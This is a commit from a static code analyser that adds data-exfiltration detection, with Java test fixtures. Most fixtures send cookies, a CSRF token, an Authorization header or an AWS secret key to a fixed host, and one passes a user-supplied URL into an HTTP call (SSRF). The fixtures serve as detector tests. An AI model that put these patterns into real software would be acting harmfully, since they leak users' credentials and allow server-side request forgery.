Added Cap::DATA_EXFIL and taint fp and fn fixes on real repos (#59)

* feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers

* feat: Implement cross-file data exfiltration detection with parameter-specific gate filters

* feat: Add calibration tests and refine DATA_EXFIL severity scoring logic

* feat: Introduce per-detector configuration for data exfiltration suppression

* feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output

* feat: Add tainted body and URL handling for data exfiltration detection

* feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go

* feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients

* feat: Add synthetic externals handling for closure-captured variables in SSA

* feat: Implement closure-based suppression for resource leak findings

* feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns

* feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders

* feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt

* feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests

* feat: Add data exfiltration sinks for various languages and enhance documentation

* refactor: Simplify formatting and improve readability in various files

* refactor: Improve readability by simplifying conditional statements and adding clippy linting

* docs: Update CHANGELOG and comments for data exfiltration features and configuration

* docs: Clarify configuration instructions for data exfiltration trusted destinations

* docs: Enhance comments for evidence routing logic in data exfiltration

tests/fixtures/java/data_exfil_apache_httpclient.java

@@ -0,0 +1,27 @@
+// DATA_EXFIL fixture: Apache HttpClient.  A request cookie (Sensitive)
+// is wrapped in a StringEntity (default smear) and attached to an
+// HttpPost via setEntity (also default smear).  The network call
+// happens at `httpClient.execute(req)`, which type-qualified resolution
+// rewrites to `HttpClient.execute` via JAVA_HIERARCHY
+// (CloseableHttpClient subtypes HttpClient).  SSRF must NOT fire (URL
+// is a hardcoded constant on the HttpPost ctor).
+//
+// Driven by `data_exfil_java_integration_tests.rs`.
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+import org.apache.http.HttpResponse;
+import org.apache.http.client.methods.HttpPost;
+import org.apache.http.entity.StringEntity;
+import org.apache.http.impl.client.CloseableHttpClient;
+import org.apache.http.impl.client.HttpClients;
+
+public class DataExfilApacheHttpClient {
+    public void leak(HttpServletRequest request) throws Exception {
+        Cookie[] cookies = request.getCookies();
+        String session = cookies[0].getValue();
+        CloseableHttpClient httpClient = HttpClients.createDefault();
+        HttpPost req = new HttpPost("https://analytics.internal/track");
+        req.setEntity(new StringEntity(session));
+        HttpResponse resp = httpClient.execute(req);
+    }
+}

tests/fixtures/java/data_exfil_jdk_httpclient.java

@@ -0,0 +1,28 @@
+// DATA_EXFIL fixture: java.net.http chain.  A Sensitive source (cookie)
+// flows through `BodyPublishers.ofString(payload)` and the request
+// builder chain into `client.send(req)` at a hardcoded URL.  SSRF must
+// NOT fire (URL is a fixed string) and `Cap::DATA_EXFIL` must fire
+// because the cookie is exactly the cross-boundary state the cap
+// targets.
+//
+// Driven by `data_exfil_java_integration_tests.rs`.
+import java.net.URI;
+import java.net.http.HttpClient;
+import java.net.http.HttpRequest;
+import java.net.http.HttpRequest.BodyPublishers;
+import java.net.http.HttpResponse.BodyHandlers;
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+
+public class DataExfilJdkHttpClient {
+    public void leak(HttpServletRequest request) throws Exception {
+        Cookie[] cookies = request.getCookies();
+        String session = cookies[0].getValue();
+        HttpClient client = HttpClient.newHttpClient();
+        HttpRequest req = HttpRequest.newBuilder()
+            .uri(URI.create("https://analytics.internal/track"))
+            .POST(BodyPublishers.ofString(session))
+            .build();
+        client.send(req, BodyHandlers.ofString());
+    }
+}

tests/fixtures/java/data_exfil_okhttp.java

@@ -0,0 +1,28 @@
+// DATA_EXFIL fixture: OkHttp two-step.  A session attribute (Sensitive)
+// is wrapped via `RequestBody.create` (default arg → return smear)
+// and bound to the request via the builder chain.  The network call
+// happens at `client.newCall(req).execute()` which hits the
+// chain-normalized `newCall.execute` matcher.  SSRF must NOT fire on
+// the hardcoded URL.
+//
+// Driven by `data_exfil_java_integration_tests.rs`.
+import javax.servlet.http.HttpSession;
+import okhttp3.MediaType;
+import okhttp3.OkHttpClient;
+import okhttp3.Request;
+import okhttp3.RequestBody;
+import okhttp3.Response;
+
+public class DataExfilOkHttp {
+    public void leak(HttpSession session) throws Exception {
+        String token = (String) session.getAttribute("csrfToken");
+        OkHttpClient client = new OkHttpClient();
+        RequestBody body = RequestBody.create(
+            token, MediaType.parse("text/plain"));
+        Request req = new Request.Builder()
+            .url("https://analytics.internal/track")
+            .post(body)
+            .build();
+        Response resp = client.newCall(req).execute();
+    }
+}

tests/fixtures/java/data_exfil_resttemplate.java

@@ -0,0 +1,23 @@
+// DATA_EXFIL fixture: Spring RestTemplate.  An HTTP header value (a
+// Sensitive source) flows directly into the request body of
+// `restTemplate.postForObject(url, body, type)`.  The destination URL
+// is hardcoded so SSRF must NOT fire.  `Cap::DATA_EXFIL` must fire on
+// the body position.  Type-qualified resolution rewrites
+// `restTemplate.postForObject` → `HttpClient.postForObject` via the
+// JAVA_HIERARCHY (RestTemplate subtypes HttpClient), reusing the same
+// flat sink rule the JDK client uses.
+//
+// Driven by `data_exfil_java_integration_tests.rs`.
+import javax.servlet.http.HttpServletRequest;
+import org.springframework.web.client.RestTemplate;
+
+public class DataExfilRestTemplate {
+    public void leak(HttpServletRequest request) {
+        String authHeader = request.getHeader("Authorization");
+        RestTemplate restTemplate = new RestTemplate();
+        restTemplate.postForObject(
+            "https://analytics.internal/track",
+            authHeader,
+            String.class);
+    }
+}

tests/fixtures/java/data_exfil_webclient.java

@@ -0,0 +1,20 @@
+// DATA_EXFIL fixture: Spring WebClient.  A Sensitive source (env var)
+// flows through `.bodyValue(payload)` on a fixed-URL chain.  SSRF must
+// NOT fire (URL is hardcoded) and `Cap::DATA_EXFIL` must fire at the
+// body-binding step, since the bare-name `bodyValue` matcher hits
+// independent of receiver type.
+//
+// Driven by `data_exfil_java_integration_tests.rs`.
+import org.springframework.web.reactive.function.client.WebClient;
+
+public class DataExfilWebClient {
+    public void leak() {
+        String secret = System.getenv("AWS_SECRET_ACCESS_KEY");
+        WebClient webClient = WebClient.create();
+        webClient.post()
+            .uri("https://analytics.internal/track")
+            .bodyValue(secret)
+            .retrieve()
+            .bodyToMono(String.class);
+    }
+}

tests/fixtures/java/ssrf_url_only_no_data_exfil.java

@@ -0,0 +1,25 @@
+// Regression fixture: a tainted URL flowing into HttpClient.send must
+// fire SSRF (taint-unsanitised-flow) but must NOT fire DATA_EXFIL.
+// The body is a hardcoded literal so no Sensitive payload reaches the
+// outbound request.  This guards against over-firing DATA_EXFIL on
+// flows where only the URL position is attacker-controlled.
+//
+// Driven by `data_exfil_java_integration_tests.rs`.
+import java.net.URI;
+import java.net.http.HttpClient;
+import java.net.http.HttpRequest;
+import java.net.http.HttpRequest.BodyPublishers;
+import java.net.http.HttpResponse.BodyHandlers;
+import javax.servlet.http.HttpServletRequest;
+
+public class SsrfUrlOnlyNoDataExfil {
+    public void doGet(HttpServletRequest request) throws Exception {
+        String target = request.getParameter("url");
+        HttpClient client = HttpClient.newHttpClient();
+        HttpRequest req = HttpRequest.newBuilder()
+            .uri(URI.create(target))
+            .POST(BodyPublishers.ofString("ping"))
+            .build();
+        client.send(req, BodyHandlers.ofString());
+    }
+}